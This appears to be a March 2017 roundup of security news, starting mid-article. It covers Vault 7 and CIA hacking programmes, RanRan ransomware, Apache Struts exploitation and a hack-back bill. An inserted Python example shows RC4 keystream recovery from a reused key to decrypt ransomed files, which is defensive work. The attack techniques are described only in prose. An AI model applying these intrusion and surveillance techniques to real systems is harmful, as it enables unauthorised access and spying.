The organization has expressed concern about the impact of the Vault 7 dump on its operations.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

WikiLeaks has claimed that the U.S. consulate in Frankfurt is used by the CIA as a covert base for hackers targeting Europe, the Middle East and Africa. Germany’s foreign ministry issued a statement saying that it takes such information very seriously and that it’s in touch with the U.S. on this matter.

According to Reuters, China also expressed concern after the WikiLeaks documents showed that the CIA may have targeted the devices of several Chinese companies, including Huawei and ZTE. The country once again claimed it opposes all forms of hacking and urged the U.S. to “stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.”

London-based Privacy International has also issued a statement, saying that if the leaks are authentic, “they demonstrate what we’ve long been warning about government hacking powers — that they can be extremely intrusive, have enormous security implications, and are not sufficiently regulated.”

Technology companies whose products are listed in the Vault 7 leaks have launched investigations to assess the impact of the alleged CIA tools. Following an initial analysis of the available information – WikiLeaks has yet to make public any actual exploits – security firms and tech giants such as Apple and Google have determined that a majority of the vulnerabilities do not affect the latest versions of their products.


Middle East Governments Targeted With RanRan Ransomware

9.3.2017 securityweek Virus
Researchers at Palo Alto Networks have come across a new piece of ransomware that has been used in targeted attacks aimed at multiple government organizations in the Middle East. Instead of asking for money, the attackers behind this campaign instruct victims to make a political statement on their website.

The ransomware, dubbed “RanRan,” is designed to encrypt various types of files stored on the infected system, including documents, archives, images, executables, logs, databases, source code and video files. A .zXz extension is assigned to encrypted files and an HTML file containing instructions on how to recover the files is dropped onto the device.

Victims are told not to shut down their computer or run any antivirus program as this can lead to “accidental damage on files.” Unlike other ransomware, which typically ask for money, the threat group behind RanRan instructs victims to create a subdomain with a politically inflammatory name on their website.

Victims are also instructed to upload to this subdomain a file named “Ransomware.txt” with the text “Hacked!” and their email address.

“By performing these actions, the victim, a Middle Eastern government organization, has to generate a political statement against the leader of the country,” said Palo Alto Networks researchers. “It also forces the victim to publicly announce that they have been hacked by hosting the Ransomware.txt file.”

Palo Alto Networks has not named any of the targeted government organizations and it has not made links to known threat groups. However, the security firm did say that it had not found any connection between these attacks and the recent Shamoon 2 campaign.

According to researchers, the RanRan malware is not sophisticated and its developers have made some mistakes when implementing the file encryption mechanism, which appears to be based on publicly available source code.

“RanRan makes a number of mistakes when encryption occurs,” researchers said. “For one, they use a symmetric cipher (RC4) with a re-used key. Additionally, some files are encrypted, but the originals are not deleted. This is due to a number of reasons, one of which being that encryption is attempted against system files and other files that are opened by running processes.”

Palo Alto Networks said victims of this ransomware may be able to decrypt some of the files if certain conditions are met.
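To show why the researchers call a reused RC4 key a mistake, here is an added Python example (not RanRan's or Palo Alto Networks' code): with a stream cipher, one surviving original file and its encrypted copy give away the keystream, which then decrypts every other file up to that length. The key, file names and contents are constructed.

```python
"""Added example (not RanRan's or Palo Alto Networks' code): recovering files
encrypted with a reused RC4 key.

RC4 is a stream cipher: ciphertext = plaintext XOR keystream, and the keystream
depends only on the key. If every file is encrypted with the same key and one
file's original survives (RanRan left originals it could not delete), then
original XOR encrypted = keystream, which decrypts the other files up to the
length of that known pair. Key, file names and contents are constructed.
"""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key scheduling (KSA) then `length` PRGA output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, data: bytes) -> bytes:
    """Encryption and decryption are the same XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def recover_keystream(known_plaintext: bytes, known_ciphertext: bytes) -> bytes:
    """Known-plaintext attack on a stream cipher: keystream = P XOR C."""
    return xor_bytes(known_plaintext, known_ciphertext)


def recover_files(known_name: str, known_plaintext: bytes, encrypted: dict) -> dict:
    """Decrypt every other file as far as the recovered keystream reaches.

    Returns {name: recovered_prefix}; files longer than the known pair are
    only partially recovered, which is the "certain conditions" caveat.
    """
    keystream = recover_keystream(known_plaintext, encrypted[known_name])
    return {name: xor_bytes(keystream, ct)
            for name, ct in encrypted.items() if name != known_name}


# Constructed victim data (not real files).
RANSOM_KEY = b"constructed-demo-key"   # the attacker's key, unknown to the victim
FILES = {
    "report.docx": b"Quarterly budget report for the ministry, draft v3, do not distribute.",
    "notes.txt": b"Meeting notes: 09:00 review, 11:00 site visit.",
    "backup.zip": bytes(range(256)) * 2,   # 512 bytes, longer than the known file
}


def simulate_infection(files: dict, key: bytes) -> dict:
    """Encrypt every file with the same RC4 key, as RanRan does."""
    return {name: rc4(key, data) for name, data in files.items()}


if __name__ == "__main__":
    enc = simulate_infection(FILES, RANSOM_KEY)
    # report.docx was open in a process, so its original survived on disk.
    for name, data in recover_files("report.docx", FILES["report.docx"], enc).items():
        print(name, "fully" if data == FILES[name] else "partially", "recovered")
```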


Apache Struts Vulnerability Exploited in the Wild

9.3.2017 securityweek Vulnerability

A high severity remote code execution (RCE) vulnerability affecting the Apache Struts 2 framework has been exploited in the wild, warns Cisco’s Talos intelligence and research group.

The vulnerability, tracked as CVE-2017-5638, can be triggered when performing file uploads with the Jakarta Multipart parser. The security hole, caused by improper handling of the Content-Type header, allows a remote, unauthenticated attacker to execute OS commands on the targeted system.

The flaw affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10, and it was addressed on March 6 with the release of versions 2.3.32 and 2.5.10.1.

Cisco Talos spotted the first exploitation attempts on March 7, shortly after someone published a proof-of-concept (PoC) exploit. According to researchers, a majority of the exploitation attempts leverage the publicly available PoC code.

Some of the attacks involve the execution of a simple Linux command, likely in an effort to determine if the targeted system is vulnerable. Researchers have observed the use of commands such as “whoami” and “ifconfig,” which allow attackers to see what user is running the service and gather information on the network configuration.

In more sophisticated attacks, threat actors stopped the Linux firewall, downloaded a malicious payload from a web server, and executed that payload. Cisco said the payloads included IRC bouncers, DoS bots, and the BillGates malware.

In other attacks, hackers also attempted to make the malware persistent by copying it to a benign folder from where it would get executed on system boot. These attacks also involved disabling the firewall service on boot.

“It is likely that the exploitation will continue on a wide scale since it is relatively trivial to exploit and there are clearly systems that are potentially vulnerable,” said Cisco’s Nick Biasini.

Biasini said many of the compromised websites have already taken steps to clean the infection. Users are advised to update their Apache Struts installations as soon as possible.

Qualys has also published a blog post and a security advisory for this vulnerability.


Wikileaks Vault7: CIA Umbrage team, the factory of false flag ops
9.3.2017 securityaffairs BigBrothers

Wikileaks Vault7 data leak – the Umbrage team was tasked by the Central Intelligence Agency with false flag hacking operations.
WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that detail CIA hacking tools and capabilities. Digging into the huge trove of files, it is possible to find information about the agency’s ability to fingerprint hacking techniques used by threat actors in the wild, both state and non-state actors.
The CIA built a specific team of experts, code-named the Umbrage team, under the Remote Development Branch inside the CIA’s Center for Cyber Intelligence.

“The CIA’s Remote Devices Branch‘s UMBRAGE group collects and maintains a substantial library of attack techniques ‘stolen’ from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA can not only increase its total number of attack types but also misdirect attribution by leaving behind the “fingerprints” of the groups that the attack techniques were stolen from.” states Wikileaks.

“UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.”

The team maintains a library of techniques borrowed from in-the-wild malware. The team has multiple purposes; knowledge of attack patterns could, of course, help the agency in forensic investigations to rapidly attribute an attack to a specific actor.

But there is also another explanation: the library could easily be included in the CIA’s projects to achieve the following goals:

To reduce the cost and time needed to develop hacking tools for use in cyber operations.

To make the attribution of cyber attacks harder, causing other threat actors to be blamed for the agency’s false flag operations.

The documents confirm that one technique borrowed by the Umbrage team was the wiping component used by the dreaded Shamoon malware, the malicious code that destroyed more than 30,000 computers at Saudi Aramco in 2012.

Since December, security experts have observed a spike in the number of attacks linked to a new variant of the malware, so-called Shamoon 2.

The first Shamoon variant abused a commercial digitally-signed driver called RawDisk, developed by a company named Eldos.

The experts at the Umbrage team used the same technique implemented by the Shamoon malware. They devised a method to bypass the license check for the RawDisk driver and implemented the same disk wiping technique in an internal hacking tool dubbed Rebound.

As a result, when malware researchers discovered a Rebound sample on a system, they identified it as a Shamoon variant instead of a CIA implant.

The UMBRAGE team has many other techniques and tools in its arsenal. For example, the experts were able to reproduce a persistence technique borrowed from the HiKit rootkit.

The CIA hackers were also able to implement the webcam capture feature used by the infamous DarkComet RAT, as well as sandbox evasion techniques borrowed from the Upclicker Trojan and the Nuclear Exploit Pack.

CIA Umbrage team

The Umbrage team was also inspired by the code leaked in 2015 from the Italian surveillance company Hacking Team.

The CIA experts focused their efforts on the implementation of the set of implants developed by Hacking Team to compromise Windows systems.

“If one is interested in using some implementations found in the source code, it should be considered a best practice to extract the desired pieces, and thoroughly review and test the extracted pieces,” is reported in the leaked files.

Unfortunately, many other intelligence agencies may have used a similar technique to deceive investigators.


According to WikiLeaks, the CIA also targeted the Czech company Avast

8.3.2017 Novinky/Bezpečnost  BigBrother

The Czech company Avast appears in the documents published on Tuesday by the WikiLeaks server as one of the security software vendors targeted by the U.S. Central Intelligence Agency (CIA). The relevant page is marked as secret but contains no further information, the Reuters agency wrote on Wednesday.
WikiLeaks published around 8,000 pages of documents on the CIA’s offensive software arsenal, with which the largest U.S. intelligence organization can penetrate mobile phones, smart TVs and other electronic devices and use them to gather information.

According to Reuters, the published documents contain enough technical detail for security experts and vendors of protective software to understand how extensive the security gaps are. However, they provide few details that could help with a quick fix.

Dozens of technology companies must quickly expand the amount of information they share in order to protect the users of their devices from snooping, Reuters writes. It relies on a statement by Avast vice president Sinan Eren, who called on the mobile software makers Apple and Google to give antivirus firms privileged access to their products and allow them to fix security gaps immediately.

“We can fend off attacks in real time if we are allowed to look inside the mobile operating system,” said Eren, who is based in Silicon Valley. “If the mobile platforms do not shut us out, we will be better able to detect that hackers have gotten into a phone,” Eren said.

Avast, founded in 2010, develops security software and its antivirus programs protect over 230 million computers and mobile devices worldwide.


Well-known iPhone and PlayStation 3 hacker ordered a Tesla. But he received a warning that hacking could mean prison
8.3.2017 Živě.cz Hacking

The hacker George Hotz, who became famous for hacking the PlayStation 3 game console and unlocking the first iPhone for use with other carriers, probably needs no further introduction. This time he made news in connection with Tesla and an order for an electric car.
According to Electrek, George Hotz ordered the latest Tesla Model S electric car equipped with the second-generation Autopilot, which already contains all the sensors and systems for fully autonomous driving, although it is not yet capable of it and users have to wait for a future software update.

Before the official delivery, however, he says he was personally contacted directly by Tesla’s lawyers, who warned him that theft of intellectual property is a criminal offense. This would apply above all if Hotz broke Tesla’s protections and obtained, for example, Autopilot recordings and other data about the system.
Last year Hotz officially shut down his startup Comma.AI, which was meant to allow easy and cheap installation of some simpler autonomous functions in selected vehicles that do not support them by default and whose manufacturers do not offer them. He ended the startup itself because of regulatory pressure and now develops the software project under a free license and the name Open Pilot. Besides support for some Honda and Acura cars, it can be assumed that he wanted to add Tesla as well.

After this warning, George Hotz decided to cancel the order. We will see whether this is just for show and whether Tesla support with a hacked version of the software “accidentally” appears in the project in the future.


CIA allegedly attacked smart TVs and most likely also impersonated Russians
8.3.2017 Živě.cz BigBrother

The WikiLeaks group has published a huge batch of data
It describes cyber attacks on various targets
Antivirus companies are not surprised by any of it
Yesterday the WikiLeaks group released to the world a huge batch of nearly nine thousand web pages and attachments that are supposed to describe the various operations of the U.S. intelligence service CIA and its partners from Europe.

The media are still cautiously analyzing the documents, because a leak of this scale is unprecedented and far exceeds even the affair surrounding the NSA and Edward Snowden.

The batch of documents, which WikiLeaks named Year Zero, is supposed to be only the first part of a much larger series called Vault 7. In any case, Year Zero describes cyber techniques from the years 2013-2016 that the CIA allegedly used for eavesdropping and intrusions into foreign computer systems.

The word allegedly is warranted here, because the CIA and U.S. authorities have so far practically not commented on the affair, so there is no way to verify the documents. After all, some observers suspect WikiLeaks itself of being merely a tool of other intelligence agencies, such as the Russian ones.

Anyone can play at being the CIA and NSA. Hacking technologies are commonly available

Whoever the author of the documents may be, they look fairly credible in themselves, because they describe procedures that in many cases are by no means unknown. Any security specialist who has gotten hold of, say, the Kali Linux distribution can play with them.

Kali Linux is a fairly ordinary operating system whose specialty is a bundle of penetration-testing tools. Kali is used, for example, by a network administrator to test the corporate infrastructure against all manner of known cyber attacks. Kali Linux can thus exploit various vulnerabilities to install trojans and malware on a target computer, enlist it in a botnet, record audio from the microphone of an Android phone, and so on.

Of course, Kali can equally be misused, and instead of testing one’s own system, used to attack any target. That is no science fiction; if the target system is vulnerable, any reasonably experienced computer owner can do it after a few minutes of studying the documentation.

How it supposedly works inside the CIA

It should therefore come as no surprise that the various intelligence services use the same basic procedures. On top of that, compared to an ordinary geek, they have one considerable advantage: economic resources. Practically unlimited resources.

According to WikiLeaks, this is also the case with the U.S. CIA, whose Directorate of Digital Innovation (DDI) allegedly has better facilities than the whole NSA. That is mainly thanks to the powerful CCI section (Center for Cyber Intelligence), under which in turn fall the EDG group (Engineering Development Group) and the Applied Engineering Division (AED).


CIA organizational structure according to WikiLeaks

While you read your work email in the morning, the engineers from AED read a briefing on the latest zero-day vulnerabilities that the night shift uncovered in Android, Windows, Apple products and elsewhere. Zero-days are bugs that nobody knows about yet, including the software’s author, so a reverse engineer can use them, for example, to create a sophisticated virus.

The problem is that discovering such bugs is very demanding work, so they are stumbled upon now and then by a top student with plenty of time and the prospect of a financial reward (many large companies have so-called bounty programs under which they pay hefty rewards for discovering unknown bugs), by the specialized teams of antivirus companies and large computer corporations (such as Google’s Project Zero team), or precisely by an engineer at a similarly generously funded agency.

But there are no amateurs at the CIA. They are well aware that if they write a trojan based on such a vulnerability, which they can then install on the computer of a person under surveillance, they will still leave traces behind that could be noticed by antivirus and other security companies, whose engineers do nothing day and night but analyze every odd behavior on the internet.

TOP 10 most vulnerable software products from 1999 to January 2017 (cvedetails.com)

Mac OS X (1,679)
Linux kernel (1,564)
Firefox (1,437)
Chrome (1,370)
iOS (984)
Flash Player (973)
Debian (933)
Internet Explorer (825)
Ubuntu (797)
OpenSUSE (783)

It is precisely for this reason that the CIA, according to the leaked documents, launched the Umbrage program, which is supposed to be a kind of sieve for malware spreading around the world. Top CIA hackers capture it and repurpose it in their own way instead of writing something entirely their own.

What is the main advantage? Not that the agents save themselves work, but that they cover their tracks. Imagine, for example, a situation in which the CIA, with the help of the NSA and other federal agencies, captures some sophisticated malware from its adversaries in Moscow. They can then use it in their own way, and when security specialists catch their modification on the network, they will think the attack was probably carried out by Russia, because the traces of the malware lead somewhere to the very east of Europe.

Weeping Angel turns a TV into a bug

Another interesting example of the capabilities of the hackers from Langley is the operation code-named Weeping Angel. The leaked documents date from 2014, so they describe an attack on what are now old series of Samsung plasma TVs equipped with microphones and a camera for Skype.

The CIA focused on Samsung TVs. Not because they are more vulnerable than the competition, but because they have the largest market share. Although the described attack concerns older models, it can be assumed that the CIA/NSA/MI5 and others have something for the latest models as well.

According to WikiLeaks, the CIA managed to switch the TV into a silent mode (referred to as “Fake-off mode”), in which the TV looked switched off but in reality was happily recording everything that happened around it through the microphone and camera. It should be noted that loading the spy malware required access to the TV’s USB port, so fear of some kind of mass monitoring is unfounded. That would not be the CIA’s role anyway, but rather the NSA’s. And even the NSA does not have the resources to eavesdrop on what goes on in every living room on the planet.

Agents could, however, most likely use Weeping Angel for targeted eavesdropping on a target, as if they had installed a classic bug in his room.

Fine Dining, or fill in the request form here and we’ll hack that rascal for you

According to the leaked documents, the CIA worked on at least 500 similar projects in 2013-2016. The question therefore arises what their use looked like in practice. Let us put ourselves in the role of an analyst who needs to obtain information about his target.

We will assume that he is no hacker himself, so he is unlikely to open a Linux terminal and start typing all sorts of commands and Python scripts from memory. According to WikiLeaks, he uses Fine Dining instead.

It is supposed to be a kind of standardized questionnaire of needs. An intelligence officer uses it to fill in everything he needs to obtain, and the Operational Support Branch (OSB) proposes the best way to achieve it, perhaps with a mix of various sophisticated attacks.

It seems, then, that the whole system inside the CIA works like a well-oiled machine, except for one small detail. If all this is true, it means that someone from inside the CIA carried out an unprecedented amount of structured data, thereby proving that although one of the most powerful American agencies has, from the perspective of, say, the Czech ones, practically unlimited technical and financial resources, someone quite successfully robbed it, which puts everything in a somewhat different light.

It’s no surprise, antivirus companies respond

Security specialists are unanimous in commenting on the current leak that surprise is not warranted. The CIA is doing exactly what it is there for and uses no techniques from the realm of science fiction, but procedures that, given knowledge of software bugs, absolutely anyone can exploit, for example using the aforementioned Kali Linux distribution or the dozens and hundreds of standalone penetration-testing tools.


10 Things You Need To Know About 'Wikileaks CIA Leak'
8.3.2017 thehackernews BigBrothers

Yesterday WikiLeaks published thousands of documents revealing top CIA hacking secrets, including the agency's ability to break into iPhones, Android phones, smart TVs, and Microsoft, Mac and Linux operating systems.
It dubbed the first release as Vault 7.
Vault 7 is just the first part of the leak series “Year Zero” that WikiLeaks will be releasing in the coming days. Vault 7 is all about a covert global hacking operation being run by the US Central Intelligence Agency (CIA).
According to the whistleblower organization, the CIA did not inform the companies about the security issues of their products; instead held on to security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, that millions of people around the world rely on.
One leaked document suggested that the CIA was even looking for tools to remotely control smart cars and trucks, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
While security experts, companies and non-profit organizations are still reviewing 8,761 documents released as Vault 7 archive, we are here with some relevant facts and points that you need to know.
Here's Everything You Need to Know About Vault 7:
WikiLeaks Exposes CIA's Mobile Hacking Secrets
Vault7 — CIA has an impressive list of ways to hack into your iOS, Android & Windows phones.
Vault 7 purportedly includes 8,761 documents and files that detail intelligence information on CIA-developed software intended to crack any Android smartphone or Apple iPhone, including some that could take full control of the devices.
In fact, Wikileaks alleges that the CIA has a sophisticated unit in its Mobile Development Branch that develops zero-day exploits and malware to "infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads."
Some of the attacks are powerful enough to allow an attacker to remotely take over the "kernel," the heart of the operating system that controls the smartphone operation, or to gain "root" access on the devices, giving the attacker access to information like geolocation, communications, contacts, and more.
These types of attacks would most likely be useful for targeted hacking, rather than mass surveillance.
The leaked documents also detail some specific attacks the agency can perform on certain smartphones models and operating systems, including recent versions of iOS and Android.
CIA Didn't Break Encryption Apps, Instead Bypassed It
Vault7 — CIA-made phone malware can read your private chats without breaking encryption.
In the hours since the documents were made available by WikiLeaks, a misconception was developed, making people believe the CIA "cracked" the encryption used by popular secure messaging software including Signal and WhatsApp.
WikiLeaks asserted that:
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloakman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied."
This statement by WikiLeaks made most people think that the encryption used by end-to-end encrypted messaging clients such as Signal and WhatsApp has been broken.
No, it hasn't.
Instead, the CIA has tools to gain access to entire phones, which would of course "bypass" encrypted messaging apps, because compromising the phone defeats virtually every other security system on it and grants the agency total remote access.
The WikiLeaks documents do not show any attack specifically against Signal or WhatsApp; rather, the agency hijacks the entire phone and listens in before the applications encrypt and transmit information.
It's like sitting in a train next to the target and reading his two-way text conversation on his phone or laptop while he is still typing; this doesn't mean that the app the target is using has any security issue.
In that case, it also doesn't matter whether the messages were encrypted in transit, if you are already watching everything that happens on the device before any security measure comes into play.
But this also doesn't mean that this makes the issue lighter, as noted by NSA whistleblower Edward Snowden, "This incorrectly implies CIA hacked these apps/encryption. But the docs show iOS/Android are what got hacked—a much bigger problem."
CIA Develops Malware to Target Windows, Linux & macOS
Vault7 — CIA also develops cross-platform malware to hack Windows, MacOS & Linux Computers
The Wikileaks CIA dump also includes information about the malware that can be used by the agency to hack, remotely spy on and control PCs running Windows, macOS, and Linux operating systems.
This apparently means that the CIA can bypass PGP email encryption and even Virtual Private Network (VPN) connections on your computer in a similar way. The agency can also see everything you are doing online, even if you are hiding it behind Tor Browser.
Again, this does not mean that using PGP, VPNs, or Tor Browser is unsafe or that the CIA can hack into these services.
But the agency's ability to hack into any OS to gain full control of any device, whether it's a smartphone, a laptop, or a TV with a microphone, makes the CIA capable of bypassing any service and spying on everything that happens on that device.
CIA Borrowed Codes from Public Malware Samples
Vault7 — CIA uses codes from publicly available #malware samples to build its own spyware.
Yes, in addition to the attacks purportedly developed by the CIA, the agency has adopted some of its code from other, public sources of malware. Well, that's what many do.
One of the documents mentions how the agency supposedly tweaks bits of code from known malware samples to develop its custom code and more targeted solutions.
"The UMBRAGE team maintains a library of application development techniques borrowed from in-the-wild malware," the WikiLeaks document reads. "The goal of this repository is to provide functional code snippets that can be rapidly combined into custom solutions."
Some of the exploits listed were discovered and released by security firms, hacker groups and independent researchers, or were purchased or otherwise acquired by the CIA from other intelligence agencies, such as the FBI, NSA, and GCHQ.
One borrowed exploit in "Data Destruction Components" includes a reference to Shamoon, a nasty malware that has the capability to steal data and then completely wipe hard drives.
Another attack acquired by the CIA is SwampMonkey, which allows the agency to get root privileges on undisclosed Android devices.
Persistence, another tool in the CIA arsenal, allows the agency to gain control over the target device whenever it boots up again.
CIA Used Malware-Laced Apps to Spy on Targets
Vault7 — Fine Dining Attack: CIA used #malware-laced apps to spy on its targets.
The leaked documents include a file, named "Fine Dining," which does not contain any list of zero-day exploits or vulnerabilities, but a collection of malware-laced applications.
Fine Dining is a highly versatile technique which can be configured for a broad range of deployment scenarios, as it is meant for situations where the CIA agent has to infect a computer physically.
CIA field agents store one or more of these infected applications, depending upon their targets, on a USB drive, which they insert into the target's system and run one of the applications to gather data from the device.
Developed by OSB (Operational Support Branch), a division of the CIA's Center for Cyber Intelligence, Fine Dining includes modules that can be used to weaponize the following applications:
VLC Player Portable
Irfanview
Chrome Portable
Opera Portable
Firefox Portable
ClamWin Portable
Kaspersky TDSS Killer Portable
McAfee Stinger Portable
Sophos Virus Removal
Thunderbird Portable
Opera Mail
Foxit Reader
LibreOffice Portable
Prezi
Babel Pad
Notepad++
Skype
Iperius Backup
Sandisk Secure Access
U3 Software
2048
LBreakout2
7-Zip Portable
Portable Linux CMD Prompt
The CIA's Desperation To Crack Apple's Encryption
Vault7 — CIA has desperately been working for years to break Apple's Encryption.
This is not the first time the CIA has been caught targeting iOS devices. It was previously disclosed that the CIA was targeting Apple's iPhones and iPads, following the revelation in 2015 of top-secret documents from the agency's internal wiki system, as part of the Snowden leaks.
The documents described that the CIA had been "targeting essential security keys used to encrypt data stored on Apple's devices" by using both "physical" and "non-invasive" techniques.
In addition to the CIA, the FBI hacking division Remote Operations Unit has also been working desperately to discover exploits in iPhones, one of the WikiLeaks documents indicates.
That could also be the reason behind the agency's effort to force Apple into developing a working exploit to hack into the iPhone belonging to one of the terrorists in the San Bernardino case.
Apple Says It Has Already Patched Most Flaws Documented in CIA Leak
Vault7 — Apple says it has already patched many iOS vulnerabilities revealed in CIA Leaks.
Besides vulnerabilities in Android and Samsung Smart TVs, the leaked documents detail 14 iOS exploits, describing how the agency uses these security issues to track users, monitor their communications, and even take complete control of their phones.
However, Apple is pushing back against claims that the CIA's stored bugs for its devices were effective.
According to Apple, many iOS exploits in the Wikileaks CIA document dump have already been patched in its latest iOS version, released in January, while Apple engineers continue to work to address any new vulnerabilities that were known to the CIA.
Here's the statement provided by an Apple spokesperson:
"Apple is deeply committed to safeguarding our customers’ privacy and security. The technology built into today’s iPhone represents the best data security available to consumers, and we’re constantly working to keep it that way. Our products and software are designed to quickly get security updates into the hands of our customers, with nearly 80 percent of users running the latest version of our operating system. While our initial analysis indicates that many of the issues leaked today were already patched in the latest iOS, we will continue work to rapidly address any identified vulnerabilities. We always urge customers to download the latest iOS to make sure they have the most recent security updates."
Hacking 'Anyone, Anywhere,' Thanks to Internet Of 'Insecure' Things
Vault7 — CIA can hack your Smart TV and other smart devices to spy on you.
Besides hundreds of exploits, zero-days, and hacking tools that target a large number of software and services, Vault 7 also includes details about a surveillance technique, codenamed Weeping Angel, used by the CIA to infiltrate smart TVs.
Samsung smart TVs are found to be vulnerable to Weeping Angel hacks that place the TVs into a "Fake-Off" mode, in which the owner believes the TV is off when it is actually on, allowing the CIA to covertly record conversations "in the room and sending them over the Internet to a covert CIA server."
"Weeping Angel already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," the leaked CIA document reads. "Since the implant is already hooking these events, the implant knows when the TV will be entering Fake-Off mode."
In response to the WikiLeaks CIA documents, Samsung released a statement that reads: "Protecting consumers' privacy and the security of our devices is a top priority at Samsung. We are aware of the report in question and are urgently looking into the matter."
WikiLeaks' CIA Leak Isn't Bigger than Snowden's NSA Leaks
The CIA isn't more advanced than the NSA TAO team, and the Vault 7 leak isn't even bigger than Snowden's.
WikiLeaks claims the massive CIA hacking leak is larger than the Edward Snowden revelations about the NSA's hacking and surveillance programs, but it is much, much smaller.
While the Snowden revelations disclosed global covert surveillance of people's text and voice communications, using hacking tools that permitted mass data gathering and analysis, the CIA data dump so far just shows that the CIA gathered and purchased tools that could be used to target individual devices.
There is no evidence of mass surveillance of smartphones or computers in the leaked documents. Technologically, the NSA is much further ahead in sophistication and technical expertise than the CIA.
Ex-CIA Chief Says Wikileaks dump has made US 'less safe'
Vault7 — Ex-CIA Chief says the CIA files leaked by Wikileaks are incredibly damaging and have put lives at risk.
Former CIA boss Michael Hayden said the latest leak of highly sensitive CIA documents and files by Wikileaks is "incredibly damaging" and has put lives at risk, BBC reports, while the CIA has not yet commented on the leaks.
The CIA revelations by the whistleblower organization are just beginning. People will see more revelations about the government and its agencies from WikiLeaks in the coming days as part of its Year Zero leaks.


Proposed Bill Would Legally Allow Cyber Crime Victims to Hack Back
8.3.2017 thehackernews Cyber
Is it wrong to hack back in order to counter a hacking attack when you have become a victim? This has been a long-running debate.
While many countries, including the United States, consider hacking back illegal, many security firms and experts consider it "a terrible idea" and officially "caution" victims against it, even as part of an active defense strategy.
Accessing a system that does not belong to you or distributing code designed to enable unauthorized access to anyone's system is an illegal practice.
However, this doesn't mean that this practice is not at all performed. In some cases, retribution is part of current defense offerings, and many security firms do occasionally hack the infrastructure of threat groups to unmask several high-profile malware campaigns.
But a newly proposed bill intended to amend section 1030 of the Computer Fraud and Abuse Act would allow victims of ongoing cyber-attacks to fight back against hackers by granting them more powers to engage in active defense measures to identify the hacker and disrupt the attack.
The new bill has been proposed by Representative Tom Graves of Georgia and is named the "Active Cyber Defense Certainty" (ACDC) Act; it would empower victims to make use of "limited defensive measures that exceed the boundaries of one's network" in order to stop and identify digital attackers.
However, this new bill allowing hacking back attackers is already stirring up some concerns about potential unintended consequences.
Many argue: when we have legal authority to defend ourselves during a physical assault, why not during a cyber attack, by hacking back the attacker?
First of all, cyberspace doesn't work the way the physical world works, as online life moves at digital speeds. In the cyber world, there is a certain sense of helplessness.
Let's understand this by an example: In a home robbery, it is legal to defend your family from the attackers while waiting for the police authorities, since the robbers are in front of you and if you don't defend, a lot can happen in the several minutes in between.
But suppose robbers robbed your house and ran away, you ran after them and caught a person you assumed to be one of them, but could not actually identify.
What if he is really an innocent person who accidentally stumbled into your hands?
This is the major concern when hacking back targets innocent people, since attribution or identification of an attacker is tough in this cyber-universe.
But if passed, the ACDC Act will allow hacking victims to "access without authorization the computer of the attacker...to gather information...to establish attribution of criminal activity to share with law enforcement or to disrupt continued unauthorized activity against the victim's own network."
But What if a Botnet-Infected System Is Used to Attack You?
It's important to note that there are some limitations. The proposed bill specifies that victims can access the attacker's computer without authorization, but only to gather information about their attackers and share it with law enforcement.
But, the bill doesn't allow hacking victims to perform activities such as destroying any information stored on the attacker's computer, causing physical damage to another person, or creating a threat that can endanger public health or safety. Well, that's commendable.
The limitation is because today so many compromised computers (botnet) are involved in cyber attacks that a hacking victim could rarely be certain they would be attacking the real attacker rather than an innocent victim.
Even worse, that compromised machine could also belong to a company that stores personal and/or financial information of its customers. So, accessing that data without authorisation would unintentionally compromise the confidentiality of the company's data.
"The first question that comes up with this, assuming you’re able to do it, is ‘Do you know who it is you would hack back against?'" said Ed McAndrew, an attorney with Ballard Spahr in Washington, and former federal cybercrime prosecutor.
"This is a real concern. You could have people hacking back at pivots (in an attack). Are you hitting back against an attacker or someone accidentally in the middle?"
Hacking Back Is Legal in Your Country, but What About Others Where Your Attacker Resides?
This bill grants you authority to hack back, but if your attacker resides in a different country, you could face hacking charges in that nation for violating its law.
So, in this case, you inadvertently become a cyber criminal for that country.
What about the cyber crimes that will take place in the name of Hacking Back?
In the whole discussion, one cannot neglect sophisticated hackers, who always find ways to carry out internet crimes.
Today, when hacking back is illegal under the Computer Fraud and Abuse Act, it's quite easy for anyone to judge who is a criminal and who is a victim.
But, if made legal, hacking back could provide broad affirmative defenses to hackers who get prosecuted, enabling them to conveniently use this law to cover their activity.
"Whatever you can convince a jury of is what truth is; that’s the view of a defense lawyer. The hacker could tell their story that they were doing this activity to aid law enforcement," said McAndrew. "You've got a lot of situations where I could envision a defendant saying they're doing this because they're trying to help law enforcement or assist victims."
Since the proposed ACDC bill is currently undergoing public discussion, you have a chance to provide feedback and make recommendations on the draft law before Rep. Graves formally introduces it to the U.S. House of Representatives.
Here's the draft [PDF] of the proposed ACDC act.


1 in 5 Websites Still Use SHA-1: Report

8.3.2017 securityweek  Safety

While most certificate authorities (CAs) haven’t been issuing certificates using the SHA-1 cryptographic hash function for more than two months, 1 in 5 websites worldwide still use such certificates, according to analysis by security firm Venafi.

